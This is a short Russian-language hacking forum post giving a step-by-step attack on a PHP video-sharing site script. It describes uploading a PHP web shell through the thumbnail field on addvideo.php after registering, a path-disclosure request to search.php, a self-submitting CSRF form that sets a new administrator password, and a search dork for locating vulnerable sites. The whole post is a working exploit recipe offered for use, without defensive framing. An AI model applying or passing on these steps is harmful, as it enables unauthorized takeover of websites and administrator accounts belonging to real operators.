Заливка шелла без прав админа : Заходим на сайт, регистрируемся : сайт/register.php, входим со своим логином и паролем, заходим сюда : сайт/addvideo.php там где thumbs выбираем свой шелл и заливаем его. После заливки он находится здесь : cайт/thumbs/имявашегошелла.php Видео о том как залить шелл : http://www.youtube.com/watch?v=v6AOwLg1v3w Раскрытие путей : PHP: сайт/search.php?search[]=way&searchsubmit= csrf уязвимость PHP: <form method=post action="http://сайт/admin/password.php" onsubmit="return checkform(this);" name="csrf"> <input type='text' name='password' value="НОВЫЙ ПАРОЛЬ КОТОРЫЙ ВЫ ПОСТАВИТЕ АДМИНИСТРАТОРУ"> </form> <script> document.csrf.submit(); </script> Поисковой запрос PHP: inurl:search.php?order=views (C)forum.kidal.org
